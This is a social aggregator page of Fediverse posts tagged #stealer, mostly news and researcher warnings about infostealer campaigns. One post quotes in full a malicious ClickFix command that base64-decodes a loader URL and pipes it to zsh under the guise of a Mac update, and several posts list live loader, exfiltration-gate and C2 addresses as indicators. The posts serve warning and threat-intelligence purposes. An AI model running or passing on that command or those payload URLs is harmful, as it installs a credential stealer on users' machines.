home.social

#stealer — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #stealer, aggregated by home.social.

fetched live
  1. Malware Campaigns Deliver Stealers via ClickFix and Phishing

    Beware of the sneaky ClickFix trick: just a click on the 'I'm not a robot' checkbox can lead to a malware attack, putting your sensitive info at risk. This clever scam uses a malicious command to download WordlistLoader, ultimately unleashing the Amatera Stealer.

    osintsights.com/malware-campai

    #MalwareOperations #Stealer #Phishing #Clickfix #Wordlistloader

  2. Złośliwe rozszerzenie do Chrome wykrada prompty z ChatGPT, Claude, Copilota i wielu innych serwisów AI

    Rozszerzenie do przeglądarki Chrome – Prompt Optimizer – Second Brain (nadal dostępne w oficjalnym sklepie Chrome Web Store) którego zadaniem jest wsparcie użytkownika podczas pracy z modelami AI, po cichu wykrada wpisywane prompty i generowane odpowiedzi. Oczywiście twórcy rozszerzenia deklarują, że dane użytkownika w żaden sposób nie są gromadzone. Jak...

    #WBiegu #Ai #Chrome #Dodatek #Keylogger #Stealer

    sekurak.pl/zlosliwe-rozszerzen

  3. GigaWiper: wiper, stealer, ransomware w jednym. Szczegółowa analiza malware

    Badacze bezpieczeństwa z Microsoft Threat Intelligence przeprowadzili analizę zaawansowanej kampanii, w której cyberprzestępcy wykorzystali rodzinę złośliwego oprogramowania o nazwie GigaWiper. Jak sama nazwa wskazuje, malware należy do kategorii wiperów, których głównym zadaniem jest bezpowrotne niszczenie danych na zainfekowanej maszynie. Działania te są realizowane poprzez usuwanie metadanych partycji dysków, szyfrowanie danych...

    #Aktualności #Malware #Microsoft #Ransomware #RAT #Stealer #Wiper

    sekurak.pl/gigawiper-wiper-ste

  4. CW: Stealer ep1

    So of course the director is the thief and he pretends to be a useless idiot so no link can be drawn with him

    #KDrama #Stealer #CRBlock

  5. Nowa fala ataków na użytkowników Windowsa. NWHStealer dystrybuowany za pomocą fałszywych instalatorów (np. ProtonVPN) oraz platform hostingowych

    Analitycy z Malwarebytes ostrzegają przed nowymi kampaniami, które łączy wspólny mianownik – infostealer ochrzczony przez badaczy jako NWHStealer. Malware jest dostarczany do użytkowników na wiele różnych sposobów: od zmodyfikowanych instalatorów ProtonVPN, OhmGraphite, Pachtop, HardwareVisualizer, po mody do gier (Xeno). Jak widać cyberprzestępcy żerują na zaufaniu użytkowników do popularnych produktów, przez...

    #Aktualności #Malware #Nwhstealer #Phishing #Protonvpn #Stealer

    sekurak.pl/nowa-fala-atakow-na

  6. Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!

    Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych “technicznych” firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że “każdy programista AI to debil”. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.
    Od czego się zaczęło?
    19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało ostatnie głośne ataki supply chain.

    Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników.

    Pierwszy to pracownik zewnętrznej firmy — Contex.ai, który pobierał …cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące [...]

    #AI #EskalacjaPrzywilejów #GoogleWorkspace #Infostealer #Malware #SaaS #Stealer #Vercel

    niebezpiecznik.pl/post/zhackow

  7. Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu

    Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...

    #WBiegu #CAPTCHA #Inifiniti #Macos #Malware #Stealer

    sekurak.pl/infiniti-stealer-no

  8. New tool for all those #Stealer #malware analysts out there:
    https://crxray[.]info
    Translate #Chrome #Extension IDs to their Names and Descriptions in Bulk.
    Currently 174,534 Extensions in database. More related tools to come.

  9. A more sane and parseable list of indicators:

    Landing page

    httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

    Loaders

    httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
    https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

    Mocked User Agent for curls

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

    APIs

    httpX://datasphere.us[.]com/api/debug/event     # initial info gathering 
    httpX://datasphere.us[.]com/gate # stealer upload location
    httpX://datasphere.us[.]com/gate/chunk # large file uploads
    httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API

    api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

    #osx #stealer #iocs

  10. Absolute state of google, (and frankly the expectations of developers for installing things).

    Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

    First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *

    echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh


    Aww man that base64 makes me feel good and trusting, wonder what's inside

    echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

    httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197


    hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
    urlscan.io/result/019d298d-3b2

    Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew pastebin.com/5cr5Nh1W
    VirusTotal thinks this new blob might be a stealer virustotal.com/gui/file/54043c

    This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
    virustotal.com/gui/file/f02758

    Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

    #osx #malware #stealer #google #brew

  11. Вредоносное ПО Mamont снова атакует РФ

    Троян Mamont продолжает вести свою вредоносную деятельность, направленную на пользователей Android-смартфонов. В ходе отслеживания активности семейств вредоносных программ для операционных систем Android эксперты отдела исследований киберугроз «Перспективного мониторинга» обнаружили вариацию вредоносного ПО Mamont с названием Фото(92).apk , датированную 2026 годом. В ходе тщательного анализа этого образца была выявлена новая панель управления C&C — fensteadom[.]com.

    habr.com/ru/companies/pm/artic

    #вредоносное_по #android #stealer #mamont #мошенники_в_интернете #telegram

  12. When you finally reverse the loader for that malware sample #VirusTotal flagged as "APT XYZ". and it turns out to be just a #Vidar #Stealer dropper.
    4 Stages including Steganography for nothing 😕

  13. #destiny #stealer at:

    http://wittenhorst\.eu/tmp/imgs.exe

    c2: 86.54.42.197

  14. Malware atakujący Discord oraz popularne przeglądarki internetowe – szczegółowa analiza VVS Stealer

    Badacze z Unit42 (Palo Alto Networks) opublikowali szczegółową analizę nowego zagrożenia jakim jest VVS Stealer (znany również pod nazwą VVS $tealer). Tym razem atakujący obrali za cel użytkowników platformy Discord. Malware, napisany w Pythonie oraz zaciemniony z wykorzystaniem komercyjnego narzędzia Pyarmor jest dystrybuowany za pomocą tejże platformy oraz sprzedawany za...

    #Aktualności #Chrome #Discord #Maas #Mozilla #Stealer #Vss

    sekurak.pl/malware-atakujacy-d